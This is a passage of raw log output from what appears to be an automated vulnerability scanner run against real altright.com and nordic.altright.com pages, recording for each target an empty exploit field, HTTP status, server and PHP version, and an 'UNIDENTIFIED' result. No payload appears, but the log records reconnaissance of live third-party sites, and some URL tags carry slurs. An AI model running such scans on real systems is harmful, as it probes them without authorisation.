  1227. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1228. |_[ + ] More details::
  1229. |_[ + ] Found:: UNIDENTIFIED
  1230.  
  1231. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1232. |_[ + ] [ 39 / 100 ]-[07:59:20] [ - ]
  1233. |_[ + ] Target:: [ https://nordic.altright.com/tag/kurder/ ]
  1234. |_[ + ] Exploit::
  1235. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1236. |_[ + ] More details::
  1237. |_[ + ] Found:: UNIDENTIFIED
  1238.  
  1239. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1240. |_[ + ] [ 40 / 100 ]-[07:59:21] [ - ]
  1241. |_[ + ] Target:: [ https://nordic.altright.com/category/nyheter/ ]
  1242. |_[ + ] Exploit::
  1243. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1244. |_[ + ] More details::
  1245. |_[ + ] Found:: UNIDENTIFIED
  1246.  
  1247. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1248. |_[ + ] [ 41 / 100 ]-[07:59:22] [ - ]
  1249. |_[ + ] Target:: [ https://nordic.altright.com/tag/narrativ/ ]
  1250. |_[ + ] Exploit::
  1251. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1252. |_[ + ] More details::
  1253. |_[ + ] Found:: UNIDENTIFIED
  1254.  
  1255. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1256. |_[ + ] [ 42 / 100 ]-[07:59:24] [ - ]
  1257. |_[ + ] Target:: [ https://nordic.altright.com/author/gustavhorngren/ ]
  1258. |_[ + ] Exploit::
  1259. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1260. |_[ + ] More details::
  1261. |_[ + ] Found:: UNIDENTIFIED
  1262.  
  1263. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1264. |_[ + ] [ 43 / 100 ]-[07:59:25] [ - ]
  1265. |_[ + ] Target:: [ https://nordic.altright.com/tag/kyrkoval/ ]
  1266. |_[ + ] Exploit::
  1267. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1268. |_[ + ] More details::
  1269. |_[ + ] Found:: UNIDENTIFIED
  1270.  
  1271. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1272. |_[ + ] [ 44 / 100 ]-[07:59:26] [ - ]
  1273. |_[ + ] Target:: [ https://nordic.altright.com/tag/dn/ ]
  1274. |_[ + ] Exploit::
  1275. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1276. |_[ + ] More details::
  1277. |_[ + ] Found:: UNIDENTIFIED
  1278.  
  1279. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1280. |_[ + ] [ 45 / 100 ]-[07:59:27] [ - ]
  1281. |_[ + ] Target:: [ https://nordic.altright.com/tag/podcast/ ]
  1282. |_[ + ] Exploit::
  1283. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1284. |_[ + ] More details::
  1285. |_[ + ] Found:: UNIDENTIFIED
  1286.  
  1287. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1288. |_[ + ] [ 46 / 100 ]-[07:59:28] [ - ]
  1289. |_[ + ] Target:: [ https://nordic.altright.com/tag/intersektionell/ ]
  1290. |_[ + ] Exploit::
  1291. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1292. |_[ + ] More details::
  1293. |_[ + ] Found:: UNIDENTIFIED
  1294.  
  1295. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1296. |_[ + ] [ 47 / 100 ]-[07:59:29] [ - ]
  1297. |_[ + ] Target:: [ https://nordic.altright.com/tag/nationaldagen/ ]
  1298. |_[ + ] Exploit::
  1299. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1300. |_[ + ] More details::
  1301. |_[ + ] Found:: UNIDENTIFIED
  1302.  
  1303. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1304. |_[ + ] [ 48 / 100 ]-[07:59:30] [ - ]
  1305. |_[ + ] Target:: [ https://nordic.altright.com/tag/lamotteokrati/ ]
  1306. |_[ + ] Exploit::
  1307. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1308. |_[ + ] More details::
  1309. |_[ + ] Found:: UNIDENTIFIED
  1310.  
  1311. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1312. |_[ + ] [ 49 / 100 ]-[07:59:32] [ - ]
  1313. |_[ + ] Target:: [ https://nordic.altright.com/tag/blatteskatt/ ]
  1314. |_[ + ] Exploit::
  1315. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1316. |_[ + ] More details::
  1317. |_[ + ] Found:: UNIDENTIFIED
  1318.  
  1319. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1320. |_[ + ] [ 50 / 100 ]-[07:59:33] [ - ]
  1321. |_[ + ] Target:: [ https://nordic.altright.com/tag/krankt/ ]
  1322. |_[ + ] Exploit::
  1323. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1324. |_[ + ] More details::
  1325. |_[ + ] Found:: UNIDENTIFIED
  1326.  
  1327. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1328. |_[ + ] [ 51 / 100 ]-[07:59:34] [ - ]
  1329. |_[ + ] Target:: [ https://nordic.altright.com/tag/soundcloud/ ]
  1330. |_[ + ] Exploit::
  1331. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1332. |_[ + ] More details::
  1333. |_[ + ] Found:: UNIDENTIFIED
  1334.  
  1335. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1336. |_[ + ] [ 52 / 100 ]-[07:59:35] [ - ]
  1337. |_[ + ] Target:: [ https://nordic.altright.com/tag/rattvisekrigare/ ]
  1338. |_[ + ] Exploit::
  1339. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1340. |_[ + ] More details::
  1341. |_[ + ] Found:: UNIDENTIFIED
  1342.  
  1343. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1344. |_[ + ] [ 53 / 100 ]-[07:59:37] [ - ]
  1345. |_[ + ] Target:: [ https://altright.com/category/news/ ]
  1346. |_[ + ] Exploit::
  1347. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1348. |_[ + ] More details::
  1349. |_[ + ] Found:: UNIDENTIFIED
  1350.  
  1351. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1352. |_[ + ] [ 54 / 100 ]-[07:59:37] [ - ]
  1353. |_[ + ] Target:: [ https://altright.com/tag/rapefugees/ ]
  1354. |_[ + ] Exploit::
  1355. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:b35b:443
  1356. |_[ + ] More details::
  1357. |_[ + ] Found:: UNIDENTIFIED
  1358.  
  1359. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1360. |_[ + ] [ 55 / 100 ]-[07:59:38] [ - ]
  1361. |_[ + ] Target:: [ https://altright.com/tag/altright/ ]
  1362. |_[ + ] Exploit::
  1363. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1364. |_[ + ] More details::
  1365. |_[ + ] Found:: UNIDENTIFIED
  1366.  
  1367. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1368. |_[ + ] [ 56 / 100 ]-[07:59:39] [ - ]
  1369. |_[ + ] Target:: [ https://altright.com/author/richardstorey/ ]
  1370. |_[ + ] Exploit::
  1371. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1372. |_[ + ] More details::
  1373. |_[ + ] Found:: UNIDENTIFIED
  1374.  
  1375. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1376. |_[ + ] [ 57 / 100 ]-[07:59:41] [ - ]
  1377. |_[ + ] Target:: [ https://altright.com/author/annsterzinger/ ]
  1378. |_[ + ] Exploit::
  1379. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1380. |_[ + ] More details::
  1381. |_[ + ] Found:: UNIDENTIFIED
  1382.  
  1383. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1384. |_[ + ] [ 58 / 100 ]-[07:59:42] [ - ]
  1385. |_[ + ] Target:: [ https://altright.com/tag/women/ ]
  1386. |_[ + ] Exploit::
  1387. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1388. |_[ + ] More details::
  1389. |_[ + ] Found:: UNIDENTIFIED
  1390.  
  1391. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1392. |_[ + ] [ 59 / 100 ]-[07:59:43] [ - ]
  1393. |_[ + ] Target:: [ https://altright.com/category/culture/ ]
  1394. |_[ + ] Exploit::
  1395. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1396. |_[ + ] More details::
  1397. |_[ + ] Found:: UNIDENTIFIED
  1398.  
  1399. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1400. |_[ + ] [ 60 / 100 ]-[07:59:44] [ - ]
  1401. |_[ + ] Target:: [ https://altright.com/author/blondie/ ]
  1402. |_[ + ] Exploit::
  1403. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1404. |_[ + ] More details::
  1405. |_[ + ] Found:: UNIDENTIFIED
  1406.  
  1407. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1408. |_[ + ] [ 61 / 100 ]-[07:59:45] [ - ]
  1409. |_[ + ] Target:: [ https://altright.com/author/righton/ ]
  1410. |_[ + ] Exploit::
  1411. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1412. |_[ + ] More details::
  1413. |_[ + ] Found:: UNIDENTIFIED
  1414.  
  1415. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1416. |_[ + ] [ 62 / 100 ]-[07:59:46] [ - ]
  1417. |_[ + ] Target:: [ https://altright.com/author/colinnliddell/ ]
  1418. |_[ + ] Exploit::
  1419. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1420. |_[ + ] More details::
  1421. |_[ + ] Found:: UNIDENTIFIED
  1422.  
  1423. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1424. |_[ + ] [ 63 / 100 ]-[07:59:47] [ - ]
  1425. |_[ + ] Target:: [ https://altright.com/category/perspective/ ]
  1426. |_[ + ] Exploit::
  1427. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1428. |_[ + ] More details::
  1429. |_[ + ] Found:: UNIDENTIFIED
  1430.  
  1431. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1432. |_[ + ] [ 64 / 100 ]-[07:59:48] [ - ]
  1433. |_[ + ] Target:: [ https://altright.com/author/ahab/ ]
  1434. |_[ + ] Exploit::
  1435. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1436. |_[ + ] More details::
  1437. |_[ + ] Found:: UNIDENTIFIED
  1438.  
  1439. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1440. |_[ + ] [ 65 / 100 ]-[07:59:49] [ - ]
  1441. |_[ + ] Target:: [ https://altright.com/reading-list/ ]
  1442. |_[ + ] Exploit::
  1443. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1444. |_[ + ] More details::
  1445. |_[ + ] Found:: UNIDENTIFIED
  1446.  
  1447. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1448. |_[ + ] [ 66 / 100 ]-[07:59:51] [ - ]
  1449. |_[ + ] Target:: [ https://altright.com/tag/arktos/ ]
  1450. |_[ + ] Exploit::
  1451. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1452. |_[ + ] More details::
  1453. |_[ + ] Found:: UNIDENTIFIED
  1454.  
  1455. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1456. |_[ + ] [ 67 / 100 ]-[07:59:52] [ - ]
  1457. |_[ + ] Target:: [ https://altright.com/author/davidgellerman/ ]
  1458. |_[ + ] Exploit::
  1459. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1460. |_[ + ] More details::
  1461. |_[ + ] Found:: UNIDENTIFIED
  1462.  
  1463. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1464. |_[ + ] [ 68 / 100 ]-[07:59:53] [ - ]
  1465. |_[ + ] Target:: [ https://altright.com/author/melissa/ ]
  1466. |_[ + ] Exploit::
  1467. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1468. |_[ + ] More details::
  1469. |_[ + ] Found:: UNIDENTIFIED
  1470.  
  1471. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1472. |_[ + ] [ 69 / 100 ]-[07:59:54] [ - ]
  1473. |_[ + ] Target:: [ https://altright.com/author/radix/ ]
  1474. |_[ + ] Exploit::
  1475. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1476. |_[ + ] More details::
  1477. |_[ + ] Found:: UNIDENTIFIED
  1478.  
  1479. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1480. |_[ + ] [ 70 / 100 ]-[07:59:55] [ - ]
  1481. |_[ + ] Target:: [ https://altright.com/2017/09/ ]
  1482. |_[ + ] Exploit::
  1483. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1484. |_[ + ] More details::
  1485. |_[ + ] Found:: UNIDENTIFIED
  1486.  
  1487. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1488. |_[ + ] [ 71 / 100 ]-[07:59:57] [ - ]
  1489. |_[ + ] Target:: [ https://altright.com/author/millennialwoes/ ]
  1490. |_[ + ] Exploit::
  1491. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1492. |_[ + ] More details::
  1493. |_[ + ] Found:: UNIDENTIFIED
  1494.  
  1495. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1496. |_[ + ] [ 72 / 100 ]-[07:59:58] [ - ]
  1497. |_[ + ] Target:: [ https://altright.com/tag/race/ ]
  1498. |_[ + ] Exploit::
  1499. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1500. |_[ + ] More details::
  1501. |_[ + ] Found:: UNIDENTIFIED
  1502.  
  1503. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1504. |_[ + ] [ 73 / 100 ]-[07:59:59] [ - ]
  1505. |_[ + ] Target:: [ https://altright.com/tag/podcast/ ]
  1506. |_[ + ] Exploit::
  1507. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1508. |_[ + ] More details::
  1509. |_[ + ] Found:: UNIDENTIFIED
  1510.  
  1511. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1512. |_[ + ] [ 74 / 100 ]-[08:00:00] [ - ]
  1513. |_[ + ] Target:: [ https://altright.com/author/guest/ ]
  1514. |_[ + ] Exploit::
  1515. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1516. |_[ + ] More details::
  1517. |_[ + ] Found:: UNIDENTIFIED
  1518.  
  1519. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1520. |_[ + ] [ 75 / 100 ]-[08:00:01] [ - ]
  1521. |_[ + ] Target:: [ https://altright.com/author/alexanderdugin/ ]
  1522. |_[ + ] Exploit::
  1523. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1524. |_[ + ] More details::
  1525. |_[ + ] Found:: UNIDENTIFIED
  1526.  
  1527. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1528. |_[ + ] [ 76 / 100 ]-[08:00:02] [ - ]
  1529. |_[ + ] Target:: [ https://altright.com/author/richardspencer/ ]
  1530. |_[ + ] Exploit::
  1531. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1532. |_[ + ] More details::
  1533. |_[ + ] Found:: UNIDENTIFIED
  1534.  
  1535. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1536. |_[ + ] [ 77 / 100 ]-[08:00:03] [ - ]
  1537. |_[ + ] Target:: [ https://altright.com/tag/antifa/ ]
  1538. |_[ + ] Exploit::
  1539. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1540. |_[ + ] More details::
  1541. |_[ + ] Found:: UNIDENTIFIED
  1542.  
  1543. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1544. |_[ + ] [ 78 / 100 ]-[08:00:04] [ - ]
  1545. |_[ + ] Target:: [ https://altright.com/author/vlaw/ ]
  1546. |_[ + ] Exploit::
  1547. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1548. |_[ + ] More details::
  1549. |_[ + ] Found:: UNIDENTIFIED
  1550.  
  1551. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1552. |_[ + ] [ 79 / 100 ]-[08:00:06] [ - ]
  1553. |_[ + ] Target:: [ https://nordic.altright.com/metapolitisk-ordlista/kulturmarxism/ ]
  1554. |_[ + ] Exploit::
  1555. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1556. |_[ + ] More details::
  1557. |_[ + ] Found:: UNIDENTIFIED
  1558.  
  1559. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1560. |_[ + ] [ 80 / 100 ]-[08:00:07] [ - ]
  1561. |_[ + ] Target:: [ https://altright.com/tag/archeofuturism/ ]
  1562. |_[ + ] Exploit::
  1563. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1564. |_[ + ] More details::
  1565. |_[ + ] Found:: UNIDENTIFIED
  1566.  
  1567. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1568. |_[ + ] [ 81 / 100 ]-[08:00:08] [ - ]
  1569. |_[ + ] Target:: [ https://altright.com/author/hannibalbateman/ ]
  1570. |_[ + ] Exploit::
  1571. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1572. |_[ + ] More details::
  1573. |_[ + ] Found:: UNIDENTIFIED
  1574.  
  1575. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1576. |_[ + ] [ 82 / 100 ]-[08:00:09] [ - ]
  1577. |_[ + ] Target:: [ https://altright.com/author/taramccarthy/ ]
  1578. |_[ + ] Exploit::
  1579. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1580. |_[ + ] More details::
  1581. |_[ + ] Found:: UNIDENTIFIED
  1582.  
  1583. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1584. |_[ + ] [ 83 / 100 ]-[08:00:11] [ - ]
  1585. |_[ + ] Target:: [ https://altright.com/author/aradmin/ ]
  1586. |_[ + ] Exploit::
  1587. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1588. |_[ + ] More details::
  1589. |_[ + ] Found:: UNIDENTIFIED
  1590.  
  1591. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1592. |_[ + ] [ 84 / 100 ]-[08:00:12] [ - ]
  1593. |_[ + ] Target:: [ https://altright.com/author/altrightpolitics/ ]
  1594. |_[ + ] Exploit::
  1595. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1596. |_[ + ] More details::
  1597. |_[ + ] Found:: UNIDENTIFIED
  1598.  
  1599. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1600. |_[ + ] [ 85 / 100 ]-[08:00:13] [ - ]
  1601. |_[ + ] Target:: [ https://altright.com/author/honoringourhistory/ ]
  1602. |_[ + ] Exploit::
  1603. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1604. |_[ + ] More details::
  1605. |_[ + ] Found:: UNIDENTIFIED
  1606.  
  1607. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1608. |_[ + ] [ 86 / 100 ]-[08:00:14] [ - ]
  1609. |_[ + ] Target:: [ https://altright.com/tag/diversity/ ]
  1610. |_[ + ] Exploit::
  1611. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1612. |_[ + ] More details::
  1613. |_[ + ] Found:: UNIDENTIFIED
  1614.  
  1615. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1616. |_[ + ] [ 87 / 100 ]-[08:00:15] [ - ]
  1617. |_[ + ] Target:: [ https://altright.com/author/danielfriberg/ ]
  1618. |_[ + ] Exploit::
  1619. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1620. |_[ + ] More details::
  1621. |_[ + ] Found:: UNIDENTIFIED
  1622.  
  1623. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1624. |_[ + ] [ 88 / 100 ]-[08:00:16] [ - ]
  1625. |_[ + ] Target:: [ https://altright.com/page/107/ ]
  1626. |_[ + ] Exploit::
  1627. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1628. |_[ + ] More details::
  1629. |_[ + ] Found:: UNIDENTIFIED
  1630.  
  1631. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1632. |_[ + ] [ 89 / 100 ]-[08:00:18] [ - ]
  1633. |_[ + ] Target:: [ https://altright.com/tag/identitarianism/ ]
  1634. |_[ + ] Exploit::
  1635. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1636. |_[ + ] More details::
  1637. |_[ + ] Found:: UNIDENTIFIED
  1638.  
  1639. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1640. |_[ + ] [ 90 / 100 ]-[08:00:18] [ - ]
  1641. |_[ + ] Target:: [ https://altright.com/author/katebernard/ ]
  1642. |_[ + ] Exploit::
  1643. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:b35b:443
  1644. |_[ + ] More details::
  1645. |_[ + ] Found:: UNIDENTIFIED
  1646.  
  1647. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1648. |_[ + ] [ 91 / 100 ]-[08:00:19] [ - ]
  1649. |_[ + ] Target:: [ https://altright.com/tag/discord/ ]
  1650. |_[ + ] Exploit::
  1651. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1652. |_[ + ] More details::
  1653. |_[ + ] Found:: UNIDENTIFIED
  1654.  
  1655. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1656. |_[ + ] [ 92 / 100 ]-[08:00:20] [ - ]
  1657. |_[ + ] Target:: [ https://altright.com/tag/sweden/ ]
  1658. |_[ + ] Exploit::
  1659. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1660. |_[ + ] More details::
  1661. |_[ + ] Found:: UNIDENTIFIED
  1662.  
  1663. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1664. |_[ + ] [ 93 / 100 ]-[08:00:21] [ - ]
  1665. |_[ + ] Target:: [ https://nordic.altright.com/author/christoffer-dulny/ ]
  1666. |_[ + ] Exploit::
  1667. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1668. |_[ + ] More details::
  1669. |_[ + ] Found:: UNIDENTIFIED
  1670.  
  1671. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1672. |_[ + ] [ 94 / 100 ]-[08:00:22] [ - ]
  1673. |_[ + ] Target:: [ https://altright.com/page/304/ ]
  1674. |_[ + ] Exploit::
  1675. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1676. |_[ + ] More details::
  1677. |_[ + ] Found:: UNIDENTIFIED
  1678.  
  1679. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1680. |_[ + ] [ 95 / 100 ]-[08:00:23] [ - ]
  1681. |_[ + ] Target:: [ https://altright.com/author/thisaltrightlife/ ]
  1682. |_[ + ] Exploit::
  1683. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1684. |_[ + ] More details::
  1685. |_[ + ] Found:: UNIDENTIFIED
  1686.  
  1687. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1688. |_[ + ] [ 96 / 100 ]-[08:00:24] [ - ]
  1689. |_[ + ] Target:: [ https://altright.com/tag/healthcare/ ]
  1690. |_[ + ] Exploit::
  1691. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1692. |_[ + ] More details::
  1693. |_[ + ] Found:: UNIDENTIFIED
  1694.  
  1695. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1696. |_[ + ] [ 97 / 100 ]-[08:00:25] [ - ]
  1697. |_[ + ] Target:: [ https://altright.com/author/stephenmcnallen/ ]
  1698. |_[ + ] Exploit::
  1699. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1700. |_[ + ] More details::
